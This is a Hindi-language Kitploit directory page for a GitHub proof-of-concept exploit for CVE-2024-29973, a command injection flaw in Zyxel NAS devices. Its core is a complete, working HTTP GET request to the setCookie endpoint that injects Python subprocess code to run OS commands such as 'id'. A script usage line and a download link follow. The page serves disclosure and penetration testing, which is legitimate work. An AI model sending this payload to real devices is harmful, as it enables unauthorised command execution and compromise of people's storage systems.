Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-29973 — CVE-2024-29973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Zyxel NAS उपकरणों में एक कमांड इंजेक्शन भेद्यता। /cmd,/simZysh/register_main/setCookie एंडपॉइंट पर एक तैयार किए गए HTTP GET अनुरोध के माध्यम से आर्बिट्रेरी OS कमांड निष्पादित करता है। | Kitploit
उपकरण/GitHubGitHub/nanowraith/cve-2024-29973
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubnanowraith/cve-2024-29973

CVE-2024-29973

CVE-2024-29973 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Zyxel NAS उपकरणों में एक कमांड इंजेक्शन भेद्यता। /cmd,/simZysh/register_main/setCookie एंडपॉइंट पर एक तैयार किए गए HTTP GET अनुरोध के माध्यम से आर्बिट्रेरी OS कमांड निष्पादित करता है।

रिपॉजिटरी देखें
1032 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-29973

image-20240619220245325

GET /cmd,/simZysh/register_main/setCookie?c0=storage_ext_cgi+CGIGetExtStoInfo+None)+and+False+or+__import__("subprocess").check_output("id",+shell=True)%23 HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: language=en

उपयोग

Python3 CVE-2024-29973.py
टूल डाउनलोड करें